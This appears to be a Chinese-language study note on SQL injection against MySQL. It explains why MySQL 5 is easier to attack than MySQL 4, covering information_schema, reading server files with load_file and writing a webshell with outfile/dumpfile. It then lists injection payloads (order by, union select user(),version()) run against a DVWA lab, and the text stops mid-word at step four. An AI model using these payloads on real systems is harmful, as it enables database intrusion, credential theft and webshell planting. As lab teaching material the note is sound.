mysql4与5的区别
mysql4 版本数据库存在着字符转义与不支持字句查询的情况,因此在注入攻击上存在着很大的局限性,只能采用类似access的方法进行查询猜解。首先,利用order by 获取当前表的字段数,在使用union select 联合查询获取想要的数据库信息。使用union select 查询数据库时,由于不知道数据库的表名和字段名,因此只能像access一样直接用常见的表名和字段名进行猜测判断。
mysql5 版本有了 information_schema 库的存在,注入攻击相对来说方便了许多,通过load_file 函数来读取脚本代码或敏感文件内容,进行漏洞分析或直接获取数据库连接账号、密码。 通过dumpfile/outfile函数导出获取webshell。
一句话:msql5比mysql4多了 information_schema数据库,5比4多了load_file函数,可以直接读服务器文件,获取账号密码。还多了dumpfile/outfile函数获取webshell。
mysql用户名和密码存储位置
数据库最高权限用户是root ,密码保存在mysql数据库的user表中,密码采用mysql5特有的加密,通过cmd5破解即可。 所以对数据库做安全的时候一定不能给root权限,一定要给一个普通权限就行。
mysql注入语句 (找一个mysql测试网站)
1. 检查注入点 ' 与and 1=1 and 1=2
2. ' order by 1,2--+&Submit=Submit# 查字段,为2个。输入1,2,3,就会报错。
3. 'union select user(),version() --+&Submit=Submit# 查看数据库用户名和版本、库名(dvwa)
正确输出:ID: 1'union select user(#,version#) --
First name: root@localhost
Surname: 5.5.53
4. 'unio